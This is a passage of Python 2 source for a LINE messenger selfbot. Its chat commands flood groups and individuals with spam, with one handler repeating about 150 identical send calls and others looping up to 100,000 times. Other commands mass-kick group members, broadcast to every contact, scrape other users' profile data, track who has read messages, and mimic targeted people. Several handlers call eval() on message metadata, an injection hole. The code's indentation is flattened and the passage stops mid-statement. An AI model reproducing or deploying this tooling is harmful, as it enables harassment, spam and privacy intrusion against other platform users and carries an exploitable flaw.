nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Jam")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
#========================== FOR COMMAND BOT FINISHED =============================#
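#========================== SPAM COMMANDS ==========================#
# The handlers below manage the stored spam text: "Spam change:"/"Spam add:"
# overwrite wait["spam"], "Spam: <n>" repeats it n times in the current chat,
# "Spam <text>" floods the chat with a fixed count, and "Spamcontact @<name>"
# sends repeated private messages to the mentioned member.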
elif "Spam change:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#=====================================
elif "Spam " in msg.text:
if msg.toType == 2:
bctxt = msg.text.replace("Spam ", "")
t = cl.getAllContactIds()
t = 500
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
#==============================================
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(msg.to, "Done")
print " Spammed !"
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Simi mode On")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Simi mode Off")
elif msg.text in ["Autoread on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto read On")
elif msg.text in ["Autoread off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto read Off")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick tag ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick tag OFF")
elif "Time" in msg.text:
if msg.toType == 2:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==============================================================================#
elif "Cleanse" in msg.text:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Cleanse","")
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ô")
cl.sendText(msg.to,"Group cleansed.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl,cl,cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
cl.sendText(msg.to,"Group cleanse")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Ulti " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close")
else:
cl.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
cl.inviteIntoGroup(msg.to,[gcmid])
else:
cl.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
cl.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#==============================================================================#
elif msg.text in ["Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
elif "@bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
#==============================================================================#
elif "mention" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
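# Lurker tracking ("setpoint"/"viewlastseen") keeps its state in wait2:
# readPoint[chat] = message id where tracking started, setTime[chat] = start time,
# readMember/ROM[chat] = who has read since then; the dict is persisted to sider.json.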
elif "setpoint on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "setpoint off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "viewlastseen" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Reader:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = ''
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i, bc)
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendText(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
# send the mention message 20 times (collapses 20 identical copy-pasted calls)
for _ in range(20):
    cl.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithURL(msg.to,wait["pap"])
elif "TL:" in msg.text:
if msg.toType == 2:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==============================================================================#
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
